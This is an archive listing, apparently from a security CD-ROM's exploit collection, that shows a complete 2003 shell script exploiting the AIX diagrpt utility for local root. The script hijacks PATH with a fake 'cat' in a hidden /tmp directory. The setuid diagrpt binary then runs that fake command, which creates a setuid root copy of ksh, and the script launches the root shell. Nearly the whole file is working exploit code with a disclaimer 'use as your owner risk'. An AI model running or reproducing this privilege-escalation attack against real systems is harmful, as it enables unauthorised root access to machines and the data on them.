home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / aix / local / o < prev    next >
Text File  |  2005-02-12  |  1KB  |  52 lines
  1. #!/bin/sh
  2. # FileName: x_diagrpt.sh
  3. # Exploit diagrpt of Aix4.x & 5L to get a uid=0 shell.
  4. # Tested  : on Aix4.3.3 & Aix5.1.
  5. # Author  : watercloud@xfocus.org
  6. # Site    : www.xfocus.org   www.xfocus.net
  7. # Date    : 2003-5-23
  8. # Announce: use as your owner risk!
  9. #
  10. # Note    :
  11. # It does not work on all versions of tsm command.
  12. # Use this command to test if your version can exploit or not :
  13. # bash$ strings /usr/lpp/diagnostics/bin/diagrpt |grep cat
  14. # diagrpt.cat
  15. # cat %s  <--- here ! have the bug !!! can exploit!
  16. #
  17.  
  18. O_DIR=`/bin/pwd`
  19. cd /tmp ; mkdir .ex$$ ; cd .ex$$
  20. PATH=/tmp/.ex$$:$PATH ; export PATH
  21. /bin/cat >cat<<EOF
  22. #!/bin/ksh -p
  23. cp /bin/ksh ./kfsh
  24. chown root ./kfsh
  25. chmod 777 ./kfsh
  26. chmod u+s ./kfsh
  27. EOF
  28. chmod a+x cat
  29.  
  30. DIAGDATADIR=/tmp/.ex$$ ; export DIAGDATADIR
  31. touch /tmp/.ex$$/diagrpt1.dat
  32.  
  33. /usr/lpp/diagnostics/bin/diagrpt -o 010101
  34. stty echo
  35. stty intr '^C' erase '^H' eof '^D' eol '^@'
  36.  
  37. if [ -e ./kfsh ] ;then
  38.   echo ""
  39.   echo "===================="
  40.   pwd
  41.   ls -l ./kfsh
  42.   echo "Exploit ok ! Use this command to get a uid=0 shell :"
  43.   echo '/usr/bin/syscall setreuid 0 0 \; execve "/bin/sh" '
  44.   ./kfsh
  45. else
  46.   echo ""
  47.   echo "Exploit false !!!!"
  48. fi
  49.  
  50. cd /tmp ; /bin/rm  -Rf /tmp/.ex$$ ;cd $O_DIR
  51. #EOF
  52.